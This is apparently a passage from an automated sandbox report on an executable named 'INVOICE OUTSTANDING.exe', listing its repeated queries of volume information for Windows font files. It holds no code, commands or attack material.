            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
